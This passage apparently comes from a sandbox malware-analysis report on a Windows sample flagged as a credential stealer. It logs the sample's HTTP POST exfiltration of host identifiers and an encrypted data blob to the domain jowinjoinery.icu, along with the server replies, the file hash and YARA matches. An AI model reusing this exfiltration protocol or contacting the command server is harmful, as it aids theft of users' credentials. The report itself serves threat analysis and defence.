form-data; name="pid"2--T65RXqd8bKyh522r7Content-Disposition: form-data; name="hwid"D930444C
2025-03-10 20:05:13 UTC	817	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBBsiOUAe1lkiekMrz9N5hUXW7rh%2Fco5Iz%2BspqgEblBzlRk99lC3%2BSiHoXEAhAr1DJU5Mdk9EF2ivZx2fx1Kuw7ak%2BDExwKWsNRbSk9h7UtxwhUBINNDq8oJ3Ur5%2FLQUgQL3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56cf16955c9bb-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7185&min_rtt=5466&rtt_var=2631&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16006&delivery_rate=431723&cwnd=190&unsent_bytes=0&cid=2687d9fc7868f047&ts=1419&x=0"
2025-03-10 20:05:13 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:15 UTC	280	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=M30gmTDPSn9qBw User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20539 Host: jowinjoinery.icu
2025-03-10 20:05:15 UTC	15331	OUT	Data Raw: 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 Data Ascii: --M30gmTDPSn9qBwContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--M30gmTDPSn9qBwContent-Disposition: form-data; name="pid"3--M30gmTDPSn9qBwContent-Disposition: form-data; name="hwid"D930444CEA5EF217E
2025-03-10 20:05:15 UTC	5208	OUT	Data Raw: dc 7f 89 4c f1 1d 84 ff 16 ed 4d b5 a4 88 ae 28 b3 93 fe 5c ea 7e 94 b5 d6 94 01 99 a9 e0 4b 5f e7 a5 ae a2 be 55 56 78 07 52 aa 7c 3e 4f 62 8d 99 8f 75 05 23 c1 f3 64 40 59 a4 61 7c 5f 9a 72 04 7b 06 76 0d fb 1e 52 bc 50 f0 d5 4e 5f 02 e6 67 c9 9a 24 70 53 aa 89 b9 33 e6 1f d9 cf 5a 08 6a a0 23 7b ff a3 b1 85 41 fc 9d ee 21 54 c8 18 70 e3 9b 3e 30 83 95 68 a6 29 81 fb 9e 39 cd 9b 5b fb 18 c9 57 9d 83 88 4a a8 fd a7 cd ec fa fd 10 d5 b2 23 4b 48 2b 28 57 f4 2c a2 8a b8 f7 d6 61 dc c4 e8 33 88 0c c2 35 16 86 a9 84 bb 7b 5a c8 5a 34 55 8d 9d 0c 8c e7 b1 92 fd cc a3 eb c4 c2 7a 41 37 73 eb 6c fb b4 b3 51 d2 aa d9 54 86 12 67 94 cc e6 8c d6 83 7c fe 3a ce a7 b7 29 26 1b d4 04 3e b9 74 96 50 4c ab c5 e2 96 4e fd ac 0c c3 8b d8 8c 65 a6 a1 29 54 8a e1 81 a9 4d Data Ascii: LM(\~K_UVxR\|>Obu#d@Ya\|_r{vRPN_g$pS3Zj#{A!Tp>0h)9[WJ#KH+(W,a35{ZZ4UzA7slQTg\|:)&>tPLNe)TM
2025-03-10 20:05:16 UTC	813	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFuS95BGs5YT6gBxaej2opgcc47%2B58%2F5jeue4jeDwKsI86rIVsBY5NVkLdGQZVoqi4G%2BQLX6LuSXGED3ZfJGEP2RhSFZRQKXRCSlYp2qS2tVc2kRJFddWoSuC3XEwqpoHx3l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56d067f9dd6cf-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9532&min_rtt=3310&rtt_var=5684&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21499&delivery_rate=633836&cwnd=242&unsent_bytes=0&cid=d32b1324138a2b98&ts=1083&x=0"
2025-03-10 20:05:16 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49716	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:18 UTC	283	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4pWBcto75KHZXU9Gzy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2569 Host: jowinjoinery.icu
2025-03-10 20:05:18 UTC	2569	OUT	Data Raw: 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 Data Ascii: --4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="pid"1--4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="hwid"D9304
2025-03-10 20:05:19 UTC	822	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNnGjj%2Fh%2B0CxIFQPykZ%2B5P92l2BOZPFdEd%2B3hpaz%2F5p6mGqciqEqbLpoZetcD%2Fe46QyI67uCcDBQpwMO86WcZGEdxJcaq6Th7y3OE%2BChcI1znmOf8Nrq2%2B4Azyfn8ZuyX%2BkW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56d198f97393a-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4988&min_rtt=4584&rtt_var=2031&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2841&recv_bytes=3488&delivery_rate=420319&cwnd=232&unsent_bytes=0&cid=5427016c3b0f777e&ts=1279&x=0"
2025-03-10 20:05:19 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49717	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:22 UTC	279	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2wCq2c1eu0zJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569809 Host: jowinjoinery.icu
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41 Data Ascii: --2wCq2c1eu0zJContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--2wCq2c1eu0zJContent-Disposition: form-data; name="pid"1--2wCq2c1eu0zJContent-Disposition: form-data; name="hwid"D930444CEA5EF217E3EDCEA
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 7b 7e 57 4e 70 f0 0c 53 7d cb de f2 ba 6c 6d d2 8a ec 25 8b eb e1 1e c4 17 2a 6a b3 7e c1 d3 3c dd d3 61 0a 70 ca b5 57 f0 2c 3b 63 c5 ca 13 cd 10 f8 af 1a d0 08 22 16 5f 90 5f ae 7b 3e 92 0c 95 c3 73 b5 a9 55 57 ed 71 0a 00 20 40 15 20 fd 7b f1 31 f1 8d b1 d4 80 b1 3e 08 c2 ac 81 e8 e1 97 41 b8 6e 6c 81 aa 87 ff f2 7b d8 d6 e6 b8 ba cb d6 9e f5 7b 50 df 6e e4 04 34 0a e1 1e db f3 e4 79 ae f8 9b ce 49 7f 6c 47 c9 dd df ef 9a fa 13 07 93 48 f3 6a 56 4f ff 24 f4 c9 b3 d0 21 ad ed 0f 83 ca ba 3e 71 11 42 13 ce 83 68 b4 3c 36 5f fd e7 75 14 29 bb 26 93 06 74 5c a2 94 3e de 0f 6e ff 52 72 fe 61 83 ba dc c9 27 44 c8 91 5e c0 27 5e 9d 15 06 b6 60 c8 f7 de 5c 9b eb ff ee 66 88 8c 69 a8 5c 0c 13 31 35 8d 84 5b b3 a6 52 34 54 d6 6b 47 04 42 72 5b 9e 09 a8 c7 d2 77 Data Ascii: {~WNpS}lm%*j~<apW,;c"__{>sUWq @ {1>Anl{{Pn4yIlGHjVO$!>qBh<6_u)&t\>nRra'D^'^`\fi\15[R4TkGBr[w
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: c5 3e e0 87 6f 7a 1f 19 2a 5d 59 99 78 aa 12 c4 6a bf 24 7b be ae af 21 7e 63 85 7d 3d b9 78 9a 53 2e eb bf 69 96 8b 75 1d b5 5b 26 9b 64 f7 c0 ef 19 a1 ad 48 25 3a 07 66 97 97 80 29 e0 af 60 3e 6f 25 63 15 cd 90 ef 8f f3 86 56 df a1 9d a8 c5 0e ab 7f ce e8 6d 64 f9 1b 4d 77 f3 4f 0a 90 bb b0 00 e9 59 ca fa a9 91 99 5e ec 55 f8 7c 3f 14 2d 3b aa 78 c1 12 45 75 0c e8 e6 77 dd 65 7d c6 bd e2 ff c0 8d 62 e9 3e 66 d1 43 d9 92 b1 6f bb 1e 2f 22 d1 66 b0 9e ae a9 9b 99 69 53 1c a1 2b f1 66 f5 da 16 3d 2e 60 1b 5a 46 ef 72 92 f0 a6 c4 28 bd 78 0a 6c 36 2c e7 21 36 02 bc 28 3b 13 a5 98 8c 2d 95 7a 9b a6 08 03 64 3b 23 ff 53 bb 36 f9 5d f5 09 d2 f1 56 7c 09 fc da 89 c6 7b 1a 18 90 a6 d6 bd c6 3c 75 e6 44 17 3d f5 cf 66 d6 65 6f 7f 7b eb 2a 0e 20 5c f8 70 38 f6 1e Data Ascii: >oz]Yxj${!~c}=xS.iu[&dH%:f)`>o%cVmdMwOY^U\|?-;xEuwe}b>fCo/"fiS+f=.`ZFr(xl6,!6(;-zd;#S6]V\|{<uD=feo{ \p8
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 4a 11 ce 14 2d 78 6c 74 03 73 d0 7e 25 d3 9c 33 cc da 3d 53 a9 ef c2 ea 45 3a fc 69 9c 46 7d d2 01 6d 0c 7d 90 01 e1 57 7e 27 48 80 9f de e5 56 ee 21 75 7a fb 70 11 b0 dc 6e bc 50 19 cd b5 25 16 cb e5 68 0c 01 7b 15 4f 0b cd 11 66 05 bb 61 26 d4 f3 f9 c3 d1 2f 7a 64 4a 4b b6 d1 a6 49 d3 38 78 3d 9b f8 e2 39 62 b6 03 62 c4 30 81 30 42 b2 22 01 f3 b5 c5 24 60 85 4b 9b 90 26 14 d1 78 b9 05 1a 98 c2 6c c6 06 da 13 6e 92 c8 c0 b8 55 85 44 0b 96 0b fd ba 2c 23 bb 78 11 56 92 19 77 9f 71 91 72 22 f7 40 58 52 f2 e8 cf ca 35 85 b4 b5 e5 ed 1e 6f 42 10 3e 83 40 a8 a0 a6 dc 83 bb e6 fe 48 56 69 e0 55 f8 fe 59 c3 b3 51 ed 53 5b f9 82 df b4 7c 45 bd 57 75 0a 2e a5 5d b4 d5 e4 3d ef c4 f9 7d 12 2f d9 3f 23 0b 99 15 2b 84 7c ea f1 84 c6 d7 9f 26 e8 bd cc dd 56 3a d7 e5 Data Ascii: J-xlts~%3=SE:iF}m}W~'HV!uzpnP%h{Ofa&/zdJKI8x=9bb00B"$`K&xlnUD,#xVwqr"@XR5oB>@HViUYQS[\|EWu.]=}/?#+\|&V:
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 62 f8 9e f0 bf 86 b6 84 dd 2e 8c 76 8d 5e 93 43 97 14 e5 d2 c7 de 5d 38 02 9e b9 6c f9 34 7a 09 79 c3 d5 7c f7 35 6d 7d e6 78 82 9f 42 43 41 bb 91 31 3e 4d e7 ea 85 fd e4 6f e1 2c 2f 08 28 81 a5 89 91 ca 8e 0c 37 cb 42 fc e3 4c fe 74 10 f2 bc 2e 3d 26 5b a5 c3 0e f3 18 f2 93 f4 d6 29 61 91 21 63 e1 05 30 55 37 78 24 3d e3 f6 e4 ae 47 b4 f3 71 f2 40 69 1c 07 08 57 f1 04 2a 72 e1 53 4a 3a d2 23 98 0d fc 40 93 1b 5e d6 5a 61 87 31 c9 7a 85 5f 2e bb 4a 11 12 38 85 4f 80 f6 b1 4f 0a 55 e8 87 b6 10 1b 97 c9 29 f6 b0 4f 19 7c 82 da fa 8e e0 c6 0e 13 e2 05 fa b1 72 44 78 53 98 4c 93 b6 d4 95 20 9b 11 60 99 ae de 41 20 80 8f d8 8f 7a 6d 7c 40 cb 24 13 5a e2 0d bf 81 82 d5 34 24 cc 1b b0 95 4b 43 40 15 41 ba 3d 20 0c ec 71 2f 53 7b fa a7 dd cc 4d 06 72 d6 bf ca 63 Data Ascii: b.v^C]8l4zy\|5m}xBCA1>Mo,/(7BLt.=&[)a!c0U7x$=Gq@iW*rSJ:#@^Za1z_.J8OOU)O\|rDxSL `A zm\|@$Z4$KC@A= q/S{Mrc
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: f9 96 cd 2b 3a 82 e1 42 60 45 80 bc 42 be 40 1f 12 22 77 66 88 6e 6a a8 7b 7f eb f9 71 89 27 a7 6a 48 54 4e b3 d0 74 cf 49 79 e1 90 3a 3d 4e 5e 3d 56 67 30 f9 96 62 12 a5 70 14 f6 d7 fa 6f 1e 9a ed 98 fd 43 24 9b 77 87 99 3b 64 8f 9a b3 e1 ff c7 5f 2e 97 a6 5c fc a3 97 07 30 ff c7 0f 02 e2 da e8 3b ee 6b 97 cc b3 7e a8 cd 1f 5d 4b fe df d2 64 2e 91 e0 e9 bd 9c 2a c0 79 10 da 78 85 f2 85 63 9b ce 4b 7f 2c 8e ff 86 9b a3 9e c1 37 11 c8 13 0c 69 47 d7 dd f3 f8 75 ee 35 59 fd 3b 04 cf 6f 5e b1 24 3b 6b bf c3 a0 ef 98 79 f4 23 b4 8d 18 dc d5 2f 2a 72 25 be f9 2e 95 90 6e ef 39 53 e0 83 26 ea 54 51 67 b4 f5 15 eb 0e 1c 1b ca 46 99 e8 41 53 9e 13 db fb 09 a5 f2 19 92 6f f9 4e cf 95 bd 3a 37 a6 93 ea 2f ac 1a f6 f3 2d 1e 3e c8 5a d2 37 e4 21 8b b9 e7 4c 5a 57 d9 Data Ascii: +:B`EB@"wfnj{q'jHTNtIy:=N^=Vg0bpoC$w;d_.\0;k~]Kd.yxcK,7iGu5Y;o^$;ky#/r%.n9S&TQgFASoN:7/->Z7!LZW
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: fc 67 27 11 92 a5 eb 4e 17 c5 18 b1 59 52 7b e5 90 24 a8 9d 9b 3d d0 4d 05 2d 08 d2 8d ae b9 1b 47 7c 8b 30 08 be 21 7a 97 73 5e 14 82 37 1c 1a 70 b0 84 97 6d 07 3f 55 86 f5 72 a6 8e 78 ae a7 29 dd cc d1 5c 3f 11 a9 8a 03 87 14 e9 b4 d9 1f 46 2f cc ce 7f 73 83 fa 7b be 47 3c 17 e6 18 f3 78 05 ed 16 f1 ff c5 c9 06 ed e6 d1 dd 42 4a f4 4c 3d e2 6a a1 4a 64 ba 32 0e b3 c7 ce b5 5f 5e de d9 db 44 3e ec a8 58 ba 7a ad 97 ee db 21 9f 98 79 0b ed 2d 52 93 29 66 87 a6 1d af dc 2d 30 37 6e fb 4b fa eb c0 52 62 62 b7 72 5e 70 fe da 2f 30 b3 d7 91 87 c9 d9 e0 8a 83 b2 d1 af 22 3e a4 01 2a 07 45 35 ca a8 6a 5f c8 83 38 04 2c 05 fc 2e fd 60 b8 f7 34 f0 4e eb 02 78 f8 de ae f3 cb ea 8f cc e7 b0 06 04 1b 1f 75 35 53 5e b2 50 4c 71 db 43 81 68 ee 06 a9 ea 58 9f 02 21 e9 Data Ascii: g'NYR{$=M-G\|0!zs^7pm?Urx)\?F/s{G<xBJL=jJd2_^D>Xz!y-R)f-07nKRbbr^p/0">*E5j_8,.`4Nxu5S^PLqChX!
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 37 62 09 13 b4 3b bc 88 b0 fd 2e 9e 3b 02 1d be c9 97 1f 02 0f c2 43 b3 17 43 e4 01 0b 24 d0 7b 58 3c 09 1a dc 55 df 5b 6f ee 1b 2f 2d 99 cf ea 13 ca 5a 02 39 b1 06 8c 65 70 eb 4e 07 ee bb da b1 27 84 f4 cd ad 09 32 a0 b1 28 6e 8f e8 d9 e3 e4 47 85 96 9d 32 9d b5 09 82 6a 14 17 4a 69 74 c5 8b 59 55 96 36 f1 b9 bf 13 c4 a1 b1 08 12 22 fc 57 01 cb 95 28 6b 38 64 18 ba 7a 75 cd a1 25 d5 28 40 4f c6 85 a7 06 c9 81 d6 14 6e b3 3f 97 c0 93 2d 12 a8 39 28 a4 64 f6 51 61 fa c4 f7 e9 6a 2f cd 3d 3f b8 a1 8b 8e 39 36 8e 97 83 af ec d3 e9 92 0d 14 46 b9 33 d7 d8 e0 73 11 8d c7 e4 47 2f fe 05 f8 23 75 b1 21 47 1a 97 45 e6 39 86 ae 19 72 ee 04 80 72 e6 19 36 1d 59 4e d1 a0 0c 9d f1 6d 52 c3 6e 0b 6a d9 06 43 bd ec 73 80 0e 2f 0d cd 53 17 77 3d 62 45 f2 89 bc d3 22 25 Data Ascii: 7b;.;CC${X<U[o/-Z9epN'2(nG2jJitYU6"W(k8dzu%(@On?-9(dQaj/=?96F3sG/#u!GE9rr6YNmRnjCs/Sw=bE"%
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 6c 45 d4 ea 34 0d 2e 5b 19 a2 11 e8 6a 6f d1 c5 35 1c f3 ee ac 03 18 e3 8c 35 98 ef bc c2 80 84 9c f9 90 51 67 99 9e 41 ac 6e 90 d5 4b 03 d2 6c 08 2b ae 40 0a 3f 58 fc cd bd 64 b1 06 09 7b 16 2c 17 ba 47 9f a3 85 f6 88 5c 1c dd f3 ad 62 46 9f 29 28 1e 67 c8 97 82 37 ce a7 a9 f6 dd 3b e2 4f b6 74 38 1e 9c 11 f0 94 c5 d0 83 87 1f 63 7d fc 0b bb 1e 0d 80 eb bd b2 6e a4 2e ca 8f ff 12 da 85 89 f1 19 65 cb 5e c0 6f 7b 47 aa ad f0 b0 73 14 29 89 66 6a d3 a1 14 28 6e f5 b7 9e 13 d7 6f df 43 a9 0b 30 cb bc c6 f6 33 01 8c d1 7f da 90 f4 64 14 a0 0f ed dd 32 c1 be 4f 8a 4e 32 6c d3 49 9c 97 b9 75 e0 38 63 96 2f 9c b2 49 7a ce 6a 00 8d bf 05 1b de c1 18 56 d2 2c 4b f5 cc cb 2d ef e0 58 c3 bf 73 a8 76 bf a4 c6 3f 3f 4e 64 ee cb c7 aa 07 51 ae f6 2b c5 2c 8c d3 8a 0e Data Ascii: lE4.[jo55QgAnKl+@?Xd{,G\bF)(g7;Ot8c}n.e^o{Gs)fj(noC03d2ON2lIu8c/IzjV,K-Xsv??NdQ+,
2025-03-10 20:05:22 UTC	15331	OUT	Data Raw: 51 0b 3f 14 d8 5c e6 8f f0 91 37 b2 fc cb 8c 04 58 c6 62 8b 74 89 0b b4 58 dc 69 f3 00 7b c8 7d 94 9d 43 8b d7 49 89 8f 99 70 1c c8 ea 08 f5 8f 16 73 e8 40 c0 65 7e 82 26 16 35 c9 c0 ce 7d ca 7f c3 0d 5a 68 da 59 c8 91 6e 8f 59 72 67 90 e7 bf 93 37 bb 1b f1 cd 40 a4 21 22 e3 c3 1a d3 20 14 b2 11 09 06 9a e8 b5 c0 16 8f 29 95 d0 6b e6 0e 97 2e ba 2f d8 6b 64 63 aa fa 3c f1 14 ce 65 fe 95 eb 80 d1 02 3e d2 a9 8b d5 dd a1 05 9a 3f 1f f5 f3 be 0e 6f 3f 4c f2 55 8f 5b 32 78 15 6d d0 5c 1c 97 65 3f 54 51 b9 78 60 06 29 d1 8c 9e d5 6c a2 a2 3a 90 61 43 d2 f2 92 af d3 ab 63 c7 8a 75 c2 2c a3 c3 82 b6 4f 14 59 90 3d f9 15 a7 1d c6 3b f7 de 72 36 cc 99 95 16 07 d3 96 08 b6 99 55 29 12 5c a4 5d db 19 8d 43 a9 32 df 69 b4 b3 f8 05 9c 95 f8 8b a9 a9 f6 b8 24 5a cc f2 Data Ascii: Q?\7XbtXi{}CIps@e~&5}ZhYnYrg7@!" )k./kdc<e>?o?LU[2xm\e?TQx`)l:aCcu,OY=;r6U)\]C2i$Z
2025-03-10 20:05:26 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WsKr82qEQ5TlsOwt8LvAf0izbAvPXb3IDFr%2BJgBihi9BhgEAbgCLz%2FUrnB3ZXjwA1xLmRpHY4W55VCHSWPeHTwFUTgKj%2B2bfqJThVCimhO9V%2FtRYLByRehEYHzEQsIoHISwS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56d320f382087-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4793&min_rtt=4780&rtt_var=1353&sent=275&recv=449&lost=0&retrans=0&sent_bytes=2840&recv_bytes=572352&delivery_rate=604592&cwnd=212&unsent_bytes=0&cid=b3c4cd26de3c362a&ts=3641&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	188.114.97.3	443	8384	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:05:28 UTC	266	OUT	POST /bdWUa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: jowinjoinery.icu
2025-03-10 20:05:28 UTC	87	OUT	Data Raw: 75 69 64 3d 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 26 63 69 64 3d 26 68 77 69 64 3d 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34 Data Ascii: uid=926e8c517364f11da70baa0a46e427522f26cc6d&cid=&hwid=D930444CEA5EF217E3EDCEA778368E34
2025-03-10 20:05:28 UTC	241	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:05:28 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close Server: cloudflare Cf-Cache-Status: DYNAMIC CF-RAY: 91e56d53ddf52039-IAD alt-svc: h3=":443"; ma=86400
2025-03-10 20:05:28 UTC	43	IN	Data Raw: fb e4 fc 4e a8 6b ab 34 37 71 25 0e 1b 22 7d d6 dd 51 13 4a 87 54 32 03 a1 21 aa 0c 2c c4 ba 1f 98 3e 00 16 8f 0a 5f fd 03 18 a6 Data Ascii: Nk47q%"}QJT2!,>_

Target ID:	0
Start time:	16:04:40
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xad0000
File size:	2'078'208 bytes
MD5 hash:	5583D74A735A4C65191340FD7A465329
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures
